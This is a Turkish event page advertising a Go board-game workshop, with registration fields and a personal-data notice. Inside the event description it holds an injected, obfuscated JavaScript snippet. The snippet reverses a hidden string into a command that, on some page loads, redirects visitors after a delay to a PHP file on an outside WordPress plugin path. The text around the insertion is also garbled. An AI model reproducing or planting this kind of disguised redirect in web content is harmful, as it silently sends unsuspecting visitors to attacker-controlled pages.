fbpx
En Yakın Etkinlikler
24.03.2020 go atölyesi Web-Face KÜÇÜK

GO Atölyesi “4000 Yıllık Strateji Savaşı”

toplam ücret)
Kontenjan: 8-16 kişi
Eğitmen : Fatih Söylemez. Kendisi Bursa GO Kulübü kurucularındandır ve 2006 yılından beri pek çok kurumda dersler vermektedir.

$NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to”>GO Oyunu, MÖ.2000’li yıllarda Çin’de ortaya çıkan ve günümüzde hala oynanmakta olan en eski tahta oyunudur. Konfüçyus ve Mencius’un GO’dan bahsettiğini ve 3.yy.da Çin’de meydana gelen uzun ve yorucu bir savaşın sonucuna GO oyunu ile karar verildiğini yazılı kaynaklardan öğrenebiliyoruz.

Adınız Soyadınız

Epostanız

Cep Telefonu

Nasıl Haberdar Oldunuz

Yaşınız

KİŞİSEL VERİLERİNİN KORUNMASI hakkında

Çok ilgi çekici olmayan ama büyük önem taşıyan şu konu hakkında seni bilgilendirmek isteriz: KİŞİSEL VERİLERİNİN KORUNMASI.Yapmış olduğun bu ön kayıt işlemi hiçbir yükümlülüğü içermez. Ön kayıt işlemi yalnızca etkinliğimizle ilgilendiğini ve kayıt sürecinde bilgilendirilmek istediğini belirtmek amacıyla kullanılır. Çevrimiçi -online- olarak yaptığın ön kayıtta adın, e-posta adresin, telefon numaran vb. bir kısım bilgiler ön kayıtta kimliğinin tanımlanması amacıyla istenmektedir. Adın, telefon numaran, e-posta adresin vb. bilgiler “Kişisel Bilgiler”dir. Gönüllü olarak bize ilettiğin bu kişisel bilgiler Kişisel Bilgilerin İşlenmesi ve Gizliliğinin Korunması Hakkında Yönetmeliğin 10. Maddesi kapsamında sadece seni etkinliklerimiz hakkında bilgilendirmek amacıyla toplanmakta olup ilgili yasa ve yönetmelik kapsamında korunacak, gizli tutulacak, hizmet kapsamı dışında kullanılmayacak ve 3.kişilerle paylaşılmayacaktır.

Onaylıyorum

Bakmak İsteyebilirsiniz...

IMG-20220216-WA0013

Hypatia “Bizi Birleştiren Şeyler, Ayıranlardan Fazladır”

Hypatia “Bizi Birleştiren Şeyler, Ayıranlardan Fazladır” 20 Şubat Pazar Saat 21.00 Katılım için lütfen formumuzu ...

Bir Cevap Yazın